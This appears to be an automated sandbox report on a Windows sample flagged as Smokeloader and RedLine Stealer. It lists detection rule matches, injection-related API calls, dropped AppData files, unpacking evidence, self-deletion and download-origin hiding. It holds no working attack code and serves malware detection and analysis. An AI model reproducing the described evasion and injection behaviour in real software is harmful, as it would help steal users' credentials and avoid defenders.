Source: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00403103 RtlCreateUserThread,NtTerminateProcess,	7_2_00403103
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014FB
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401641
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00403257 RtlCreateUserThread,NtTerminateProcess,	7_2_00403257
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401606
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401613
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401627
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015FB
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00403103 RtlCreateUserThread,NtTerminateProcess,	9_2_00403103
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004014FB
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_00401641
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00403257 RtlCreateUserThread,NtTerminateProcess,	9_2_00403257
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_00401606
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_00401613
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_00401627
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004015FB

Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00415C90		7_2_00415C90
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00415C90		9_2_00415C90

Source: LgigaSKsL6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: LgigaSKsL6.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: A869.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ajvrjra.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vsvrjra.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@23/3

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

Code function: 0_2_02C4A856 CreateToolhelp32Snapshot,Module32First,

0_2_02C4A856

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vsvrjra

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\A869.tmp

Jump to behavior

Source: LgigaSKsL6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LgigaSKsL6.exe	ReversingLabs: Detection: 42%
Source: LgigaSKsL6.exe	Virustotal: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\LgigaSKsL6.exe "C:\Users\user\Desktop\LgigaSKsL6.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vsvrjra C:\Users\user\AppData\Roaming\vsvrjra
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A869.exe C:\Users\user\AppData\Local\Temp\A869.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ajvrjra C:\Users\user\AppData\Roaming\ajvrjra
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vsvrjra C:\Users\user\AppData\Roaming\vsvrjra
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ajvrjra C:\Users\user\AppData\Roaming\ajvrjra
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A869.exe C:\Users\user\AppData\Local\Temp\A869.exe	Jump to behavior

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vsvrjra	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ajvrjra	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Unpacked PE file: 0.2.LgigaSKsL6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.beve:W;.cac:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vsvrjra	Unpacked PE file: 5.2.vsvrjra.400000.0.unpack .text:ER;.rdata:R;.data:W;.beve:W;.cac:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Unpacked PE file: 7.2.A869.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.moboge:W;.woyucad:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ajvrjra	Unpacked PE file: 9.2.ajvrjra.400000.0.unpack .text:ER;.rdata:R;.data:W;.moboge:W;.woyucad:W;.rsrc:R; vs .text:EW;

Source: LgigaSKsL6.exe	Static PE information: section name: .beve
Source: LgigaSKsL6.exe	Static PE information: section name: .cac
Source: A869.exe.1.dr	Static PE information: section name: .moboge
Source: A869.exe.1.dr	Static PE information: section name: .woyucad
Source: ajvrjra.1.dr	Static PE information: section name: .moboge
Source: ajvrjra.1.dr	Static PE information: section name: .woyucad
Source: vsvrjra.1.dr	Static PE information: section name: .beve
Source: vsvrjra.1.dr	Static PE information: section name: .cac

Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02C4E2AF push esp; ret	0_2_02C4E2B1
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02C4D14F pushfd ; iretd	0_2_02C4D150
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02C4C652 push B63524ADh; retn 001Fh	0_2_02C4C689
Source: C:\Users\user\Desktop\LgigaSKsL6.exe	Code function: 0_2_02FC1540 pushad ; ret	0_2_02FC1550
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02CC1540 pushad ; ret	5_2_02CC1550
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02D7E097 push esp; ret	5_2_02D7E099
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02D7CF37 pushfd ; iretd	5_2_02D7CF38
Source: C:\Users\user\AppData\Roaming\vsvrjra	Code function: 5_2_02D7C43A push B63524ADh; retn 001Fh	5_2_02D7C471
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00402842 pushad ; retf F6A4h	7_2_004029D1
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00401065 pushfd ; retf	7_2_0040106A
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00402805 push 21CACAEFh; iretd	7_2_0040280A
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00402511 push ebp; iretd	7_2_00402523
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00403325 push eax; ret	7_2_004033F3
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00403433 pushad ; ret	7_2_004035AB
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00401182 push esp; retf	7_2_0040118E
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_00402A9D pushad ; retf	7_2_00402AAB
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_004012B7 push cs; iretd	7_2_004012B8
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA11E9 push esp; retf	7_2_02BA11F5
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA10CC pushfd ; retf	7_2_02BA10D1
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA131E push cs; iretd	7_2_02BA131F
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA2B04 pushad ; retf	7_2_02BA2B12
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA2578 push ebp; iretd	7_2_02BA258A
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Code function: 7_2_02BA286C push 21CACAEFh; iretd	7_2_02BA2871
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00402842 pushad ; retf F6A4h	9_2_004029D1
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00401065 pushfd ; retf	9_2_0040106A
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00402805 push 21CACAEFh; iretd	9_2_0040280A
Source: C:\Users\user\AppData\Roaming\ajvrjra	Code function: 9_2_00402511 push ebp; iretd	9_2_00402523

Source: LgigaSKsL6.exe	Static PE information: section name: .text entropy: 7.53432336875115
Source: A869.exe.1.dr	Static PE information: section name: .text entropy: 7.543174328690701
Source: ajvrjra.1.dr	Static PE information: section name: .text entropy: 7.543174328690701
Source: vsvrjra.1.dr	Static PE information: section name: .text entropy: 7.53432336875115

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A869.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ajvrjra	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vsvrjra	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ajvrjra			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vsvrjra			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\lgigasksl6.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

